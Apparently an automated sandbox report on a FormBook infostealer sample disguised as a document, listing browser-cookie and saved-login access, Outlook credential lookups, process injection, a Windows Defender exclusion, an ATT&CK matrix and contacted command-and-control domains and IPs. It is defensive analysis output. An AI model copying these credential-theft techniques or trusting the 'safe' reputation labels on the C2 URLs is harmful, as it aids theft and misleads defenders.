                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1510085 Sample: PASU5160894680 DOCS.scr.exe Startdate: 12/09/2024 Architecture: WINDOWS Score: 100 35 www.academy-training.xyz 2->35 37 www.xsg.icu 2->37 39 21 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 55 9 other signatures 2->55 10 PASU5160894680 DOCS.scr.exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 C:\Users\...\PASU5160894680 DOCS.scr.exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 14 vbc.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 19 uFLByAWAOFbhtV.exe 14->19 injected 73 Loading BitLocker PowerShell Module 17->73 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 control.exe 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 uFLByAWAOFbhtV.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.lyxor.top 203.161.43.228, 49755, 49756, 49757 VNPT-AS-VNVNPTCorpVN Malaysia 27->41 43 www.healtheduction.site.cdn.hstgr.net 84.32.84.37, 49783, 49784, 49785 NTT-LT-ASLT Lithuania 27->43 45 9 other IPs or domains 27->45 69 Found direct / indirect Syscall (likely to bypass EDR) 27->69 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PASU5160894680 DOCS.scr.exe32%ReversingLabs
                PASU5160894680 DOCS.scr.exe100%AviraTR/AD.Swotter.hefne
                PASU5160894680 DOCS.scr.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/?0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.com/designers?0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                http://www.fontbureau.com/designers0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fonts.com0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.fontbureau.com0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.fontbureau.com/designers80%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://files.cloud.naver.com/GetList.ndrive0%Avira URL Cloudsafe
                http://files.cloud.naver.com/Status/GenerateKey.ndrive0%Avira URL Cloudsafe
                http://www.sssqqq07-22.fun/78aq/0%Avira URL Cloudsafe
                http://static.nid.naver.com/enclogin/keys.nhnIhttps://nid.naver.com/nidlogin.login0%Avira URL Cloudsafe
                http://files.cloud.naver.com/MakeDirectory.ndrive?0%Avira URL Cloudsafe
                http://static.nid.naver.com/login.nhn?svc=wme&amp;url=http%3A%2F%2Fwww.naver.com&amp;t=201204250%Avira URL Cloudsafe
                http://www.lyxor.top/top4/0%Avira URL Cloudsafe
                http://www.academy-training.xyz/1ki5/0%Avira URL Cloudsafe
                http://cloud.naver.com/0%Avira URL Cloudsafe
                http://www.cake11298.online/7ew2/0%Avira URL Cloudsafe
                http://www.fslab.tech/5jwl/0%Avira URL Cloudsafe
                http://www.globyglen.info0%Avira URL Cloudsafe
                https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
                http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                http://www.globyglen.info/tni7/0%Avira URL Cloudsafe
                https://www.healtheduction.site/2frz/?3tV=l87n7Q89KFkj22mcQvGyKsY8DOdSYtwW2ZIksm0w5n2yQMdP8QPDEmc5KU0%Avira URL Cloudsafe
                http://www.shipincheshi.skin/25kr/0%Avira URL Cloudsafe
                http://www.justlivn.net/n3rq/0%Avira URL Cloudsafe
                http://files.cloud.naver.com/DoDelete.ndrive0%Avira URL Cloudsafe
                http://www.thinkphp.cn0%Avira URL Cloudsafe
                http://files.cloud.naver.com/CheckUpload.ndrive0%Avira URL Cloudsafe
                http://files.cloud.naver.com0%Avira URL Cloudsafe
                http://files.cloud.naver.com/Status/Get.ndrive0%Avira URL Cloudsafe
                http://www.unveiled.digital/swnk/0%Avira URL Cloudsafe
                http://www.jobworklanka.online/c85h/0%Avira URL Cloudsafe
                http://www.healtheduction.site/2frz/0%Avira URL Cloudsafe
                http://www.vip66.zone/ymla/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.academy-training.xyz
                		79.125.89.83
                		truetrue
                  		unknown
                  www.lyxor.top
                  		203.161.43.228
                  		truetrue
                    		unknown
                    www.healtheduction.site.cdn.hstgr.net
                    		84.32.84.37
                    		truetrue
                      		unknown
                      ncumibrs.github.io
                      		185.199.108.153
                      		truetrue
                        		unknown
                        laohuang.zhongshengxinyun.com
                        		43.135.99.21
                        		truetrue
                          		unknown
                          jobworklanka.online
                          		91.184.0.200
                          		truetrue
                            		unknown
                            unveiled.digital
                            		3.33.130.190
                            		truetrue
                              		unknown
                              justlivn.net
                              		76.223.113.161
                              		truetrue
                                		unknown
                                www.shipincheshi.skin
                                		154.23.176.197
                                		truetrue
                                  		unknown
                                  globyglen.info
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    www.fslab.tech
                                    		160.251.148.115
                                    		truetrue
                                      		unknown
                                      vip66.zone
                                      		3.33.130.190
                                      		truetrue
                                        		unknown
                                        www.sssqqq07-22.fun
                                        		45.113.201.77
                                        		truetrue
                                          		unknown
                                          www.xsg.icu
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.healtheduction.site
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.cake11298.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.vip66.zone
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.unveiled.digital
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.justlivn.net
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.jobworklanka.online
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.mypos.support
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.jz07259dkijw.cloud
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.globyglen.info
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.lyxor.top/top4/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.sssqqq07-22.fun/78aq/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.academy-training.xyz/1ki5/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.cake11298.online/7ew2/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fslab.tech/5jwl/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.globyglen.info/tni7/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.justlivn.net/n3rq/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.shipincheshi.skin/25kr/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.unveiled.digital/swnk/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.vip66.zone/ymla/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.healtheduction.site/2frz/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.jobworklanka.online/c85h/true
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://duckduckgo.com/chrome_newtabcontrol.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designersGPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://duckduckgo.com/ac/?q=control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://static.nid.naver.com/enclogin/keys.nhnIhttps://nid.naver.com/nidlogin.loginPASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/?PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cn/bThePASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers?PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://files.cloud.naver.com/GetList.ndrivePASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://static.nid.naver.com/login.nhn?svc=wme&amp;url=http%3A%2F%2Fwww.naver.com&amp;t=20120425PASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://files.cloud.naver.com/MakeDirectory.ndrive?PASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tiro.comPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
